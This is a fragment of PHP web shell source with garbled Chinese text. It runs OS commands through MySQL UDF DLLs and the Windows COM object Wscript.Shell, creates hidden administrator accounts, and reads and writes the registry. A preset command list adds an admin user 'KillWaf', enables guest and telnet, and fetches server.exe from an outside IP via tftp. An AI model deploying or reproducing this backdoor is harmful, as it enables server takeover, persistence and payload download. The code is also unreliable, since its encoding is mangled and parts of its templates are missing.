$MSG_BOX = @mysql_query($query, $conn) ? '��װDLL�ɹ�' : '��װDLLʧ��';
} else {
$MSG_BOX = '����DLL�ļ�ʧ��';
}
} else {
$MSG_BOX = 'д����ʱ��ʧ��';
}
@mysql_query('DROP TABLE Envl_Temp_Tab;', $conn);
} else {
$MSG_BOX = '������ʱ��ʧ��';
}
}
if (!empty($_POST['runcmd'])) {
$query = 'select state("' . $sqlcmd . '");';
$result = @mysql_query($query, $conn);
if ($result) {
$k = 0;
$info = NULL;
while ($row = @mysql_fetch_array($result)) {
$infotmp .= $row[$k];
$k++;
}
$info = $infotmp;
$MSG_BOX = 'ִ�гɹ�';
} else {
$MSG_BOX = 'ִ��ʧ��';
}
}
} else {
$MSG_BOX = '����MYSQLʧ��';
}
}
print <<
function Fullm(i){
\tStr = new Array(11);
\tStr[0] = "ver";
\tStr[1] = "net user KillWaf 1P@ssWord /add";
\tStr[2] = "net localgroup administrators KillWaf /add";
\tStr[3] = "net start Terminal Services";
\tStr[4] = "tasklist /svc";
\tStr[5] = "netstat -ano";
\tStr[6] = "ipconfig";
\tStr[7] = "net user guest /active:yes";
\tStr[8] = "copy c:\\\\1.php d:\\\\2.php";
\tStr[9] = "tftp -i 219.134.6.245 get server.exe c:\\\\server.exe";
\tStr[10] = "net start telnet";
\tStr[11] = "shutdown -r -t 0";
\tmform.sqlcmd.value = Str[i];
\treturn true;
}
END;
break;
case "mysql_exec":
if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
$cookietime = time() + 24 * 3600;
setcookie('m_eanverhost', $_POST['mhost'], $cookietime);
setcookie('m_eanverport', $_POST['mport'], $cookietime);
setcookie('m_eanveruser', $_POST['muser'], $cookietime);
setcookie('m_eanverpass', $_POST['mpass'], $cookietime);
die('���ڵ�½,���Ժ�...');
}
}
print <<
��ַ
�˿�
�û�
����
END;
break;
case "winapi":
//Windows����ӿ�
//function winshell()
//{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript���ʧ��");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : 'silic';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$shell1 = new COM("wscript.shell") or die("require windows host");
$action = isset($_POST['action']) ? $_POST['action'] : '';
echo ' ';
echo '��ȡ&д��&ɾ��ע��� ';
echo ' ';
print << |
END;
$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
$rpath = str_replace("\\\\", "\\", $rpath);
if ($action == "read") {
$out = $shell1->RegRead($rpath);
echo '' . var_dump($out) . ' ';
echo '
';
}
print << |
END;
$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
$wpath = str_replace("\\\\", "\\", $wpath);
$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
if ($action == "write") {
$shell1->RegWrite($wpath, $wvalue, $wtype);
}
print << |